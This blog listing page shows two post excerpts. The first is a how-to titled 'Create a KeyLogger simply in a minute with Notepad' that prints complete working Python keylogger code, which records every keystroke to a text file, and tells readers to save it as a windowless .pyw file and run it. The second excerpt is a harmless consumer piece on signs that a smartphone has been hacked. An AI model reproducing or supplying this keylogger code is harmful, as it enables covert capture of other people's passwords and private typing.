Posts

Showing posts with the label safe

Create a KeyLogger simply in a minute with Notepad

Image
Keylogger also called keystroke logging, are software programs or hardware devices that record keys struck on the computer keyboard of an individual computer user or network of computers.It almost records every keystroke that user typed and saved as a text file. Just open the notepad and copy paste the script. import pyHook, pythoncom, sys, logging # feel free to set the file_log to a different file name/location file_log = 'keyloggeroutput.txt' def OnKeyboardEvent(event): logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s') chr(event.Ascii) logging.log(10,chr(event.Ascii)) return True hooks_manager = pyHook.HookManager() hooks_manager.KeyDown = OnKeyboardEvent hooks_manager.HookKeyboard() pythoncom.PumpMessages() Now save it something filename.pyw and execute the keylogger file. When you need to quit logging, open up task manager and execute all the “python” forms. At that point search for keyloggeroutput.txt in a similar index were the som...

How to know your smart phone has been Hacked

Image
Smartphones are almost always connected to the internet, so it stands to reason that your phone hacked remotely. Hackers are always out there looking for entry points, and they seem to get more and more sophisticated as time moves along.Even if you keep your smartphone safe in your pocket or purse, it’s still at risk for picking up a virus or leaking data to thieves. Hackers don’t need physical access to your phone to steal your personal information or infect the device with malware. They can even use your data's for something special makes profit. The first indication that your phone hacked might have some form of malware or spyware installed would be random popups. Your phone runs out of battery faster than normal. If you don’t keep apps running in the background, there could be an unknown app running on your phone and draining energy. The next thing you should be on the lookout for is your data usage. Spyware apps by nature like to “phone home,” meaning that the data they steal ...